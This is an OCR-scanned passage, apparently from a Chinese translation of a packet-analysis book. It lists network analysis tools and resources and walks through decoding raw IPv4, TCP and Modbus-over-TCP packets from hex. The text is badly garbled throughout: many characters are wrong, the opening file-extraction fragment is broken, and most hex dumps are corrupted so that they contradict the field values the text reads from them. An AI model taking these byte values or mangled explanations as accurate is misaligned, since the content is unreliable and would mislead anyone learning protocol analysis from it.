53873/guL somMeone-visitor-nonsense-tont 
igantic-dance-thirdy [576.9 B] 

keHFLYXhma > application/x-shockwav 

B54996,/earnest-fantastic-thorough-weave-grotesq 

-awaken-fountain) [28.8 EB] (Magic: 62) 

/obsen\ n/enVjzZ2dtcnpz -> opplication/octet-stream (enVjZzz2dtcnpz) [359.9 KB] (Magic: BINARY) 

/VOEHSQ. php?v=x4 | 

Z76N1Lm .php?n=x4 jo6 -> text/html C76NiLm,php) [14.0 B] (Mogic: TEXT) 

/VOEHSQ .php?w=9m 311xud7aj -> text/ntml CYOEHSQ.php) [0.8 B] 

/76N1iLm.php?g=9m822y311lxud7aj -> text/ntml (C76NiLm.php) [120,8 KB] (Magic; TEXT) 

/VOEHSQ .php?h=ttfkjb668038kiz -> text/hntml (CYOEHSQ.php) [9.0 B] 

/76N1iLm.php?i=ttfkijb668038kiz -> text/html (76NiLm.php) [6.0 8B] (Magic: TEXT) 


gro 


pF 
sen 
村 
3: 
4; 
5 
6; 
了 


PD 
~ 








图 A-3 在 pcapr 上 得 看 DHCP 流 量 捕获 


每 次 要 奏 找 菏 种 确定 英 型 的 通信 样 例 时 ， 我 都 是 首先 在 pcapr 上 搜 
索 。 如 果 你 在 目 己 的 试验 中 创建 了 大 量 不 同 的 捕获 文件 ， 不 要 犹 殉 ， 请 
将 它们 上 传 到 pcapr 社 区 分 享 。 


8. NetworkMiner 


NetworkMiner 是 一 款 主 要 用 于 网 络 取 证 的 工具 ， 但 我 发 现 它 在 其 他 
一 些 情形 下 也 非常 实用 。 虽 然 它 也 可 以 用 来 捕获 数据 包 ， 但 它 的 强项 在 
于 如 何 解析 数据 包 。NetworkMiner 会 检测 PCAP 文 件 中 网 络 各 问 的 操作 
系统 类 型 ， 并 将 文件 解析 成 主机 间 的 会 话 。 它 其 至 允许 你 直接 从 捕获 记 
录 中 提取 传输 的 文件 。 


9. Tcpreplay 


每 当 有 一 堆 数 据 包 需 要 在 线路 上 重 传 以 观察 设 备 如 何 啊 应 它们 时 ， 
我 束 用 Tcpreplay 来 执行 这 个 任务 。Tcpreplay 专 门 设计 用 来 重 传 PCAP 文 
件 里 的 数据 包 。 


10. ngrep 


如 果 你 熟悉 Linux， 坚 无 疑问 ， 你 肯定 用 过 grep 搜 索 数 据 。 ngrep 与 
它 非常 相似 ， 允许 你 在 PCAP 数 据 上 执行 特定 搜索 。 当 捕 获 和 显示 过 滤 
侨 都 无 法 实现 我 的 目标 或 者 实现 太 复 林 时 ， 我 吏 使 用 ngrep。 


11. Libpcap 

如 琳 你 计划 开 肥 一 球 应 用 程序 ， 来 进行 一 些 确 实 融 级 的 数据 包 解 
析 ， 或 是 创建 处 理 数据 包 ， 那 么 你 要 对 Libpcap 非 常熟 杰 。 简 言 之 ， 
Libpcap 是 一 个 用 于 网 络 流量 捕获 的 可 移植 的 C/C++ 库 。Wireshark、 
Tcpdump， 以 及 其 他 大 部 分 数据 包 分 析 工 具 都 在 一 定 层 次 上 依赖 于 
Libpcap 。 
12. Hping 


Hping 是 你 武器 库 中 应 有 的 “瑞士 军刀 ”之 一 。Hping 是 一 个 命令 行 的 
数据 包 操 纵 和 传输 工具 。 它 文 持 各 种 各 样 的 协议 ， 反 应 非常 快 且 直观 。 


13. Domain Dossier 


如 果 你 需要 查询 域名 或 I[P 地 址 的 注册 人 信息， 那么 Domain DossierI 上 
合 你 意 。 它 快速 、 人 简单、 有 效 。 


14. Perl 和 Python 

Perl 和 Python 虽然 不 是 工具 ， 但 却 和 是 值得 留意 的 脚本 语言 。 当 你 玖 
练 于 数据 包 分 析 时 ， 你 会 过 到 没有 目 动 化 工具 满足 要 求 的 情况 。 在 那些 
情况 下 ， 首 选 Perl 和 Python 语言 编写 工具 ， 它 们 可 以 市 你 在 数据 包 上 做 
些 有 趣 的 事情 。 对 于 大 部 分 应 用 程序 ， 我 通常 使 用 Python， 但 这 只 是 个 
人 选择 。 
A.2 数据 包 分 析 和 资源 


从 Wireshark 的 主页 到 教程 、 博 客 ， 有 很 多 可 用 的 数据 包 分 析 资 源 。 


我 将 在 此 列 出 我 最 喜欢 的 一 些 。 
1. Wireshark 主 页 


与 Wireshark 有 天 的 首要 资源 束 是 它 的 主页 。 主 页 包括 软件 文档 、 一 
四 的 包含 了 捕获 文件 样 例 的 wiki， 以 及 Wireshark 邮 件 列 表 的 注 
册 信 息 。 


2. SANS 宏 全 入 侵 检 测 深 入 课程 


作为 一 名 SANS 导 是， 我 可 能 会 有 点 偏 宜 ， 但 我 真 不 认为 这 个 星球 
上 有 比 《SANS SEC 503: 深度 入 侵 检 测 》 更 好 的 数据 包 分 析 谍 程 。 这 
个 课程 集中 于 数据 包 分 析 的 安全 方面 。 即 便 你 不 集中 于 安全 ， 访 课程 之 
前 提供 的 对 数据 包 分 析 和 对 Tcpdump 的 介绍 也 是 我 所 见 最 好 的 。 


该 课程 由 我 的 两 位 数据 包 分 析 英 雄 Mike Poor 和 Judy Novak 讲 授 。 它 
每 年 提供 好 几 次 直播 。 若 你 的 旅行 经 费 有 限 ， 没 关系 ， 该 课程 也 通过 基 
于 Web 的 按 需 格式 在 线 讲 授 。 


3. Chris Sanders 的 博客 


我 没有 太 多 时 间 写 博客 ， 但 借 尔 也 会 在 我 的 博客 上 与 一 些 有 天 数据 
包 分 析 的 文章 。 如 来 没有 列 的 ， 我 的 博客 残 作为 链接 到 我 写 的 其 他 文革 
和 书籍 的 门户 ， 另 外 它 也 提供 了 我 的 联系 方式 。 


4. Brad Duncan 欠 泪 意 软件 流量 分 析 网 站 


我 最 豆 欢 有 的 安全 相关 数据 包 捕 获 资 源 古 Brad Duncan 的 恶意 软件 尝 
量 分 析 (MTA) 网 站 。Brad 每 周 多 次 发 布 包 售 感 染 链 的 数据 包 捕 获 资 
源 ， 这 些 捕获 资源 包含 相关 的 恶意 软件 二 进 制 文 件 以 及 正在 有 友和 后 的 事件 
的 搬 述 。 如 果 你 想 获 得 解析 恶意 软件 感染 的 经 验 并 了 解 当 前 的 恶意 软件 
拉 术 ， 请 先 下 载 其 中 一 些 捕获 资源 并 笠 试 理解 它们 ， 你 可 以 访问 该 网 
站 ， 以 便 在 发 布 更 新 时 收 到 提醒 。 


D。 IANA 


互联 网 编号 分 配 机 构 (Internet Assigned Numbers Authority， 
IANA) 负 贡 监督 为 北美 分 配 卫 地 址 和 协议 号 码 。 它 的 网 站 提供 了 一 些 
有 价值 的 参考 工具 ， 比 如 奏 找 端口 号 、 奏 看 有 天 顶级 域名 的 信息 ， 以 及 
浏览 合作 以 网 站 奏 疝 RFC 文 档 。 


6. 《TCP/IP 评 解 》 (Addison-Wesley) 

对 生活 在 数据 包 层 次 的 人 而 言 ，Richard Stevens 博 士 撰写 的 系列 书 
籍 是 书架 上 的 主要 书目 ， 已 被 多 数 人 奉 为 TCP/IP 圣 经 。 这 是 我 最 喜欢 的 
TCP/P 书 籍 ， 也 是 我 写作 本 书 时 经 彰 参 考 的 文献 。 
7. 《TCP/IP 指 南 》 (No Starch 出 版 社 ) 

在 TCP/IP 领 域 里 ， 我 最 喜欢 的 为 一 本 书 是 Charles M. Kozierok 写 


的 。 这 本 已 赫 厚 达 1000 多 页 ， 内 容 非 第 评 细 ， 并 且 为 视 沉 型 学 习 痢 人 惟 备 
了 大 量 很 优秀 的 图 表 。 


维 孙 也 “分析 数 据 包 结构 





在 本 附 了 未 中， 我们 将 讨论 数据 包 的 表现 形 却 。 我 们 将 得 看 被 解析 为 
十 六 进 制 形 陈 的 数据 包 ， 克 外 ， 我 们 将 介绍 如 何 使 用 数据 包 结 构图 碍 看 
和 表示 数据 包 。 


由 于 有 大 量 的 软件 为 你 解析 数据 包 ， 因 此 在 数据 包 噢 探 和 分 析 时 ， 
你 不 需要 理解 本 附录 中 的 内 容 。 但 是 ， 如 果 你 投入 一 些 时 间 学 习 数 据 包 
原始 数据 及 其 结构 ， 会 更 好 地 理解 Wireshark 之 类 的 工具 展示 给 你 的 内 
容 。 在 分 析 数 据 时 ， 数 据 抽 象 程度 越 低 越 好 。 


B.1 数据 包 表 现形 式 


数据 包 能 够 以 很 多 表现 形式 被 解析 。 数 据 包 原始 数据 可 以 表现 为 二 
进 制 数据 一 二 进 制 的 0、1 序 列 ， 如 : 


91160666661616601161011160660666016161166606001606060000066660166600000000000160661166 
90010 
116101011011166660666660600000000000060066660606006060000000006001666606001660000000000 


16011 
9110166666660600000160600000116666666000000000000066601666600001000000000166666 
90010 





二 进 制 数 码 是 数据 信息 在 最 压 层 的 表现 形式 ，1 表 示 珊 电 平 信和 写 ，0 
表示 低 电 平 信和 号。 每 一 个 数字 是 一 位 ， 八 位 是 一 字 节 。 然 而 ， 人 们 很 难 
向 读 和 理解 二 进 制 数据 ， 所 以 我 们 通 第 将 二 进 制 数 据 转 换 为 十 六 进 制 一 
由 字母 和 数字 组 成 的 十 六 进 制 数 据 ， 如 : 


4566 6634 46f2 4666 8666 535c ac16 1689 
4a7d 5f68 6646 8656 7c23 5ab7 6666 8606060 


8602 2666 6b36 6666 0264 65b4 6163 63062 
9101 064062 





十 六 进 制 〈“ 通 第 价 写 为 hex) 是 便 用 数字 0 一 9 和 字母 A 一 FE 表 示 数 但 
的 计数 系统 。 十 六 进 制 是 第 用 的 数据 包 表 示 形 式 ， 因 为 其 形式 人 简洁， 并 
且 很 容易 被 转换 为 更 基础 的 二 进 制 。 在 十 六 进 制 中 ， 两 个 字符 表示 一 个 
宇 节 ， 即 八 位 。 字 节 中 的 每 个 字符 是 一 个 半 字 站 《4 位 ) ， 堪 侧 的 值 是 
高 位 〈 半 ) 字 节 ， 右 侧 的 值 是 低位 《〈 半 ) 字 节 。 在 示例 数据 包 中 ， 第 一 
个 字 节 为 45， 其 中 ， 忆 位 字 蔬 是 4， 低 位 字 下 和 古 5。 


数据 包 中 ， 字 节 的 地 址 (或 位 置 ) 使 用 偏 移 量 表示 法 表达 ， 从 0 开 
人 。 因 此， 数据 包 中 的 第 一 个 字 节 (45) 位 于 0x00， 第 二 个 字 节 (00) 
位 于 0x01， 第 三 个 字 节 (00) 位 于 0x02， 依 此 类 推 。0x 说 明 使 用 的 是 十 
六 进 制 表示 法 。 在 表示 一 个 长 度 大 于 一 字 节 的 地 址 时 ， 地 址 占用 的 字 闻 
数 在 一 个 冒号 之 后 使 用 数值 表示 。 例 如 ， 在 表示 示例 数据 包 的 前 4 字 贡 
的 地 址 时 ， 使 用 0x00:4 表 示 。 在 我 们 后 续 使 用 数据 包 结 构图 剖析 “车 驶 
一 个 神秘 的 数据 包 ” 中 的 未 知 协议 时 ， 此 处 的 说 明 非 常 重 要 。 


LL 注 志 生 卫 时时 时 时 时 时 时 于 时 和 和 和 和 


据 我 观 肾 ， 人 们 在 分 析 数 据 包 时 普遍 的 错误 是 志 了 从 0 开始 计算 地 址 。 的 确 很 难 习惯 从 0 
开始 计算 ， 因 为 大 部 分 人 学 习 的 都 是 从 1 开始 计数 。 我 已 经 分 析 数 据 包 很 多 年 了 ， 但 是 仍然 





会 犯 这 样 的 错 。 我 能 给 出 的 最 好 的 建议 是 ， 不 要 害怕 放手 指数 数 。 你 也 许 会 觉得 这 样 看 起 来 
很 患 苇 ， 但 是 这 其 实 没什么 丢人 的 ， 尤 其 是 在 能 帮 你 得 出 正确 丛 双 的 情况 下 。 








在 更 高 的 层级 ， 一 个 与 Wireshark 关 似 的 工具 使 用 协议 分 析 需 将 数据 
包 使 用 完全 解析 的 形式 展示 出 来 ， 我 们 后 续 将 介绍 此 工具 。 本 例 中 的 数 
据 包 做 Wireshatk 解 析 后 ， 如 图 B-1 所 示 。 


EE 1 0.000000 172.16.16.128 74.125.95.104 TCP 66 1606—80 和 Seq=0 Win=8192 Len=0 MSS=1460 WS=4 SACK_PERM=1 
四 


a 二 i 
the rn : i 21:99:4c (00:05:5d:21:99:4c) 
Dst: 74.125. 104 Se 125.95.104) 


ytes 
a ags: Ox002 (SYN) 
2 
i ize: ni 
sum: oba0 [v ali dation disabled] 


rgen 
由 0 ES 人 二 Sh imum segment size, No-Operation (NOP), Window scale, No-Operation (NOP), No-Operation (NOP), SACK permitte 


00 05 5d 21 99 4c 00 21 6a 5b 二 08 00 45 00 pe Bd -aE 
00 2 SO f2 A 0 局 06 53 5c ac 10 10 80 4a 7d A A 
不 06 46 5anb 00 00 00 00 80 02 ## 也 
03 20 ob 30 06 六 02 04 05 b4 01 03 03 02 01 0 
0 04 02 





图 B-1 Wireshark 解 析 后 的 数据 包 


Wireshark 显 示 数 据 包 信息 ， 并 为 各 字段 这 加 标签 。 原 始 数据 包 并 不 
包含 标签 ， 但 是 其 中 的 数据 按照 协议 标准 规定 的 明确 格式 排列 。 完 全 解 
扩 数 据 包 意味 者 将 数据 按照 ' 议 标准 分 析 为 各 有 标签 的 、 可 阅读 的 文 


Wireshark 及 类 似 的 工具 能 够 完全 解析 数据 包 ， 因 为 它们 的 内 置 协议 
分 析 器 对 协议 各 字段 的 地 址 、 长 度 和 值 进 行 了 和 定义。 例如， 图 B-1 中 的 
数据 包 按 照 传输 控制 协议 pe 标准 分 成 多 个 部 分 ， 包 括 带 有 标签 的 
字段 和 值 。 其 中 一 个 标签 是 源 问 口 〈Source Port) ， 值 为 十 进 制 的 
1606。 这 使 你 在 2 分 析 数 据 包 时 和 E 够 轻易 找到 指 定 信 息 。 当 你 能 够 使 用 此 
类 工具 时 ， 它 们 会 成 为 你 完成 分 析 工 作 的 一 个 高 效 的 方式 。 


Wireshark 有 成 百 上 于 个 协议 分 析 右 ， 但 是 你 仍 有 可 能 过 到 
Wireshark 无 法 解析 的 协议 ; 广 商定 制 的 未 广 泛 使 用 的 协议 和 定制 的 恶意 
软件 协议 经 利 会 是 这 种 情况 。 当 这 样 的 事情 发 生 时 ， 数 据 包 中 只 有 部 分 
内 容 能 够 被 解 机 。 这 也 是 Wireshark 默 认 在 界面 下 方 提 供 原 始 的 十 六 进 制 
包 数 据 的 原因 (如 图 B-1 所 示 )。 


普 表 的 情况 是 ， 如 Tcpdump 的 命令 行程 序 不 提供 太 多 的 协议 分 析 
， 而 是 显示 大 量 原始 十 六 进 制 数 据 。 对 于 一 些 更 复杂 的 应 用 层 协议 而 
言 ， 这 种 情况 尤为 弟 见 ， eps ot ly A 因此 ， 当 我 们 使 用 
Tcpdump 时 ， 看 到 被 部 分 解析 的 数据 包 是 单 态 。 一 个 使 用 Tcpdump 分 析 
数据 包 的 例子 如 图 B-2 所 示 。 


@ © 1. bash 
bash 
94:45:53.927963 IP 192.1638 。 a 131.2874 > 192.168.118.138.582: Fia ags [P. ]， seq 1104341762:1164341714, 日 KK | 
h 1 


54918 ， es 56564718，1e 
Bx6666: 4506 pe Bbfd 4666 8666 1668 ceaB 6e83 
8x00190: cea8 6eB8a 681a 01f6 41d2 eac6 6115 3ace 
6x6626: 56818 fcc6 6032 608060 96d1 6666 0666 6163 
6x6636: 69661 9661 





图 B-2 Tcpdump 中 部 分 解析 的 数据 包 


当面 对 部 分 解析 的 数据 包 时 ， 你 需 使 用 更 确 层 的 数据 包 结 构 知 识 。 
Wireshark、Tcpdump 及 大 部 分 其 他 工具 提供 了 十 六 进 制 的 原始 包 数 据 ， 
帮助 我 们 进行 更 搬 层 的 分 析 工 作 。 


B.2 便 用 数据 包 结 构图 


我 们 在 第 1 草 中 学习 a 到， 数据 包 赴 控 照 协议 规定 的 方式 排列 的 数 
扬 。 因 为 过 用 协议 按照 指定 的 规则 排列 包 数 据 ， 所 以 软 便 件 能 够 解析 这 
些 数 据 ， 数 据 包 必须 遵守 明确 的 格式 规则 。 使 用 数据 包 结 构图 ， 我 们 能 
够 识 列 格式 并 解析 数据 包 。 一 个 数据 包 结 构图 古 数 据 包 的 图 形 化 表现 方 
式 ， 使 分 析 人 员 能 够 将 任意 给 定 协 议 的 数据 包 从 原始 十 六 进 制 学 市 映 册 
至 具体 字段 。 结 构图 从 协议 的 RFC 文 档 中 提取 ， 显 示 了 协议 中 各 字段 的 
长 度 和 排列 顺序 。 


让 我 们 查看 第 6 章 中 的 IPv4 的 数据 包 结 构图 〈( 见 图 B-3) 。 





图 B-3 ”IPv4 的 数据 包 结 构图 


在 这 个 结构 图 中 棋 轴 表示 0 一 31 的 二 进 制 位 。 换 算 成 字 节 ， 为 0 一 
3。 纵 轴 也 按照 位 和 字 市 进行 标记 ， 每 行为 一 个 32 位 或 4 子 市 ) 万 段 。 
我 们 便 用 数 轴 来 计算 字段 地 址 的 俩 移 量 ， 根 据 纵 轴 确 定 字段 位 于 哪个 4 
字 节 万 段 ， 然 后 根 扼 横 轴 确 定 给 字段 以 字 世 为 单位 的 偶 移 量 。 第 一 行 由 
前 四 个 凶 市 组 成 ，0~~3， 在 模 轴 上 进行 标记 。 第 二 行 由 之 后 的 四 字 太 组 
成 ， 4 一 7， 同 样 在 横 轴 上 进行 计数 。 我 们 从 字 节 4 开始 计数 ， 对 应 的 横 
轴 刻 度 为 0， 下 一 个 字 节 是 字 节 5， 对 应 的 横 轴 刻度 为 1， 以 此 类 推 。 


例如 ， 我 们 查看 IPv4 的 结构 图 ，0x01 字 节 是 服务 类 型 字段 。 计 算 方 
式 : 在 纵 轴 上 看 ， 服 务 类 型 字段 位 于 第 一 行 ， 对 应 纵 轴 刻度 为 0， 所 以 
从 0 开始 计数 ， 在 横 轴 上 看 ， 该 字段 位 于 刻度 1， 所 以 该 字段 位 于 ， 从 0 
开始 且 依 移 量 为 1 字 节 的 位 置 ， 即 位 于 0x01 子 市 。 


册 得 看 万 一 个 例 于 ，0x08 字 节 是 存活 时 间 字 段 。 计 算 方 式 : 在 纵 轴 
上 上 看， 存活 时 间 字 段位 于 第 三 行 ， 对 应 纵 轴 刻度 为 8， 所 以 从 8 开始 计 
数 ， 在 模 轴 上 看 ， 访 字段 位 于 刻度 0; 所 以 该 字段 位 于 ， 从 8 开始 ， 仿 移 
量 为 0 字 贡 的 位 置 ， 即 位 于 0x08 字 他。 


有 些 字 段 ， 如 源 IP 字 段 ， 长 度 为 多 个 字 广 ， 我 们 在 图 中 看 到 ， 位 于 
0x12:4。 其 他 一 些 字 段 只 占用 了 半 字 节 ， 如 0x00 字 节 的 局 位 字 市 为 版 本 
字段 ， 低 位 字 市 为 IP 头 长 度 字 段 。0x06 字 闻 的 粒度 更 细 ， 每 一 位 都 表示 
一 个 字段 。 当 字段 的 值 为 日 个 二 进 制 数 值 时 ， 它 通 第 是 一 个 标记 
(flag) 。 如 IPv4 头 中 的 翻转 〈Reversed) 、 不 分 片 (Donm’t Fragment) 
和 多 个 分 片 〈“More Fragments) 字段 。 标 记 的 值 为 一 个 一 位 的 二 进 制 数 
值 ，1 (true) 或 0 (false) ， 所 以 当 标 记 值 为 1， 表 示 标 记 生 效 。 标 记 生 
效 的 具体 含义 根据 协议 和 字段 而 定 。 


让 我 们 在 图 B-4 中 碍 看 另 一 个 例子 〈 这 个 络 构图 和 在 第 6 草 出 现 过 ) 。 





图 B-4 ”TCP 的 数据 包 结 构图 
这 个 图 户 展 示 了 TCP 协 议 头 。 根 据 这 张 角 ， 我 们 能 够 在 不 知道 TCP 


用 途 的 情况 下 ， 回 众人 很 多 与 TCP 数 据 包 有 关 的 问题 。 假 设 一 个 TCP 数 据 
包 的 协议 类 如 下 方 的 十 六 进 制 数 据 所 示 : 


0646 8656 7c23 5ab7 6666 6666 8662 2666 
ob36 6666 6264 65b4 6163 6362 0161 6402 


人 
以 下 信和 号 。 


。 源 端 口号 位 于 0x00:2 字 节 〈0x00 至 0x01) ， 十 六 进 制 值 为 0646 (十 
进 制 : 1606) 。 

。 目的 端口 号 位 于 0x02:2 字 节 (0x02 至 0x03) ， 十 六 进 制 值 为 
0050 〈 十 进 制 : 80) 。 

。 数据 仿 移 量 字 段 表 示 协 议 头 长 度 ， 位 于 0x12 字 节 的 高 位 字 节 ， 十 六 
进 制 值 为 8。 


让 我 们 将 这 些 知识 用 来 分 析 这 个 神秘 的 数据 包 。 
B.3 分 析 一 个 神秘 的 数据 包 


在 图 B-2 中 ， 我 们 看 到 了 一 个 被 部 分 解析 的 数据 包 。 我 们 通过 委 解 
析 的 部 分 数据 来 确定 ， 这 是 一 个 TCP/IP 数 据 包 ， 该 数据 包 在 同一 网 络 内 
的 两 个 设备 间 传 输 ， 然 而 除 此 之 外 ， 我 们 对 该 数据 的 其 他 信息 并 不 了 
解 。 以 下 是 这 个 数据 包 的 完整 十 六 进 制 数 据 : 


4506 860634 8bfd 4666 8666 1668 ca8 6e83 
coOa8 6e8a 081a 61f6 41d2 eac6 e115 3ace 
5018 fcc6 60606032 6660 606d1 6666 06006066 86810603 
9061 6001 


数据 包 大 小 为 52 罕 节 。 卫 协议 的 数据 包 结 构图 告诉 我 们 ， 了 下 协议 头 
的 标准 长 度 为 20 子 市 ;根据 0x00 子 届 的 低位 子 市 表示 的 头 文件 长 度 ， 我 
们 确认 了 这 一 信息 。 根 据 TCP 的 包 结 构图 ， 我 们 同样 了 解 到 ， 在 没有 附 
加 选项 的 情况 下 ，TCP 协 议 头 的 长 度 也 是 20 字 市 “此 处 没有 列 出 TCP 绽 
构图 ， 但 是 我 们 在 第 6 半 中 对 TCP 选 项 进行 了 深入 讨论 ) 。 这 意味 看 ， 
数据 包 的 前 40 个 字 节 是 TCP 和 和 IP 协议 尖 数 据 ， 这 些 数据 已 经 被 解析 。 现 
在 ， 还 剩 下 12 字 他 未 被 解析 。 


060d1 6666 6666 6163 6661 6661 


如 朱 没 有 分 析 数 据 包 结构 的 知识 ， 你 现在 可 能 会 一 宕 砚 展 ， 但 旦 你 
己 经 知道 了 如 何 将 数据 包 结 构图 应 用 于 未 解析 数据 。 在 本 例 中 ， 已 经 解 
析 的 TCP 数 据 包 表明 ， 数 据 的 目的 端口 号 古 502。 在 识别 未 解析 数据 


时 ， 码 看 通信 使 用 的 端口 并 不 一 定 会 奏效 ， 但 这 是 一 个 好 的 切入 所 。 

Google 搜 索 结 果 显 示 ，502 冰 口 是 基 于 TCP 的 Modbus 协 议 的 贡 用 端口 ， 

该 协议 用 于 工业 控制 系统 〈ICS) 网 络 。 我 们 将 十 六 进 制 包 数据 与 

PE 来 核实 和 分 析 本 例 的 数据 包 ， 如 图 B-5 
不 。 


基于 TCP 的 Modbus 


0 HR 


图 B-5 ”其 于 TCP 的 Modbus 的 数据 包 结 构图 


这 个 数据 包 结 构图 根据 Modbus 的 应 用 指导 文档 制作 。 图 B-5 结 构图 
表明 ， 位 于 0x04:2( 相 对 头 部 起 始 位 置 的 偏 移 量 〉 的 长 度 字 上 段 包 含 一 个 
7 字 节 的 头 部 。 按 照 这 个 偶 移 量 ， 我 们 在 对 应 的 位 置 上 发 现 其 十 六 进 制 
值 为 0006〈 对 应 的 十 进 制 值 为 6) ， 这 表明 ， 紧 随 这 个 字段 之 后 有 6 字 
节 ， 实 际 也 是 如 此 。 看 起 来 这 的 确 是 基于 TCP 的 Modbus 数 据 。 


将 完整 的 十 六 进 制 数 据 和 Modbus 结 构图 比较 ， 以 下 是 提取 出 的 信 
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。 事件 标识 字段 位 于 0x00:2 字 节 〈0x00 一 0x01) ， 十 六 进 制 值 为 
00d1。 诅 字段 用 于 将 应 和 丛 和 请 求 进行 配对 。 

。 协议 标识 字段 位 于 0x02:2 字 节 〈0x02 一 0x03) ， 十 六 进 制 值 为 

0000。 这 表明 协议 为 Modbus。 

长 度 字 段位 于 0x04:2 字 节 (0x04~~0x05) ， 十 六 进 制 值 为 0006。 这 

定义 了 数据 部 分 长 度 。 

。 单元 标识 字段 位 于 0x06 字 节 ， 十 六 进 制 值 为 01。 表 示 此 数据 包 用 于 
系统 内 路 由 。 

。 功能 码 字 段位 于 0x07 字 段 ， 十 六 进 制 值 为 03。 这 表示 调用 读 取 保持 
寄存 需 〈Read Holding Registers) 功能 ， 用 于 从 一 个 系统 谈 取 一 个 
数值 。 

。 根据 功能 码 3， 需 要 再 输入 两 个 数据 字段 。 在 0x08:4 字 布 发 现 了 参 
考 编 号 (Reference Number) 和 单词 计数 (Word Count) ， 这 两 个 
字段 的 十 六 进 制 值 均 为 0001。 


这 个 神秘 的 数据 包 能 够 按照 Modbus 协 议 的 标准 被 完全 解读 。 如 果 
你 正在 对 产生 这 个 数据 包 的 系统 进行 故障 处 理 ， 以 上 解析 出 来 的 内 容 应 
该 是 你 同 前 推进 所 需要 的 信息 。 吏 算 你 不 会 遇 到 Modbus 数 据 ， 对 于 如 
FA 
很 好 例子 。 


了 解 你 正在 分 析 的 数据 的 抽象 方式 ， 总 是 一 种 最 好 的 分 析 思 路 。 这 
能 帮助 你 做 出 更 合理 和 明智 的 决定 ， 使 你 能 在 更 多 样 化 的 场景 中 处理 数 
据 包 。 在 很 多 情景 下 ， 我 只 能 使 用 命令 行 工 具 ， 如 Tcpdump， 进 行 数据 
包 分 析 。 因 为 大 部 分 这 样 的 工具 缺少 很 多 应 用 层 协 议 的 分 析 左 ， 所 以 手 
动 对 数据 包 中 的 原始 数据 进行 分 析 的 能 力 极 其 重要 。 


| 六 喜 生 时 时 时 时 时 时 寺 糯 i 


我 的 一 位 同事 曾经 负责 在 一 个 高 安全 级 别 的 环境 中 进行 应 急 啊 应 。 他 很 清和 葬 他 需要 检查 
所 负责 系统 的 数据 ， 但 是 不 能 接 入 存储 这 些 数据 的 特定 系统 。 在 他 们 的 工作 时 间 内 ， 他 们 能 
做 的 只 有 将 数据 包 从 特定 的 会 话 中 打印 出 来 。 痒 亏 千 握 了 数据 包 组 成 和 数据 包 结构 分 析 的 基 





础 知识 ， 他 能 够 从 打印 出 的 数据 中 获得 他 需要 的 信息 。 当 然 ， 这 个 分 析 过 程 相当 缓慢 。 这 是 
一 个 极端 的 场景 ， 但 是 ， 这 是 能 证 明 通 用 的 、 与 工具 无 关 的 知识 很 重要 的 例 于 。 





由 于 以 上 陈述 的 原因 ， 伦 连 时 间 将 数据 包 拆 分 ， 以 获得 使 用 多 种 方 
式 分 析 数 据 包 的 经 验 ， 对 我 们 很 有 帮助 。 我 在 这 方面 下 了 很 多 功夫 : 我 
打印 了 一 坚 利 用 协议 的 数据 包 续 构图 并 进行 封 甬 ， 然 后 将 这 些 图 片 放 在 
书 果 劳 。 我 还 在 笔记 本 电脑 和 平板 中 你 存 了 电子 版 本 ， 以 便 外 出 时 快速 
伍 赔 。 为 了 方便 获取 ， 我 在 随 本 书 友 放 的 抓 包 文 件 的 压 绚 包 中 包含 了 一 
些 单 用 的 数据 包 结 构图 。 


B.4 小 结 


在 本 附录 中 ， 我 们 学 习 了 如 何 解 析 多 种 格式 的 数据 包 ， 以 及 如 何 使 
用 数据 包 结 构图 对 未 解析 的 数据 进行 分 析 。 利 用 这 些 知 识 ， 你 应 该 能 够 
理解 如 何在 不 依赖 于 特定 工具 的 情况 下 查看 并 分 析 数 据 包 。 


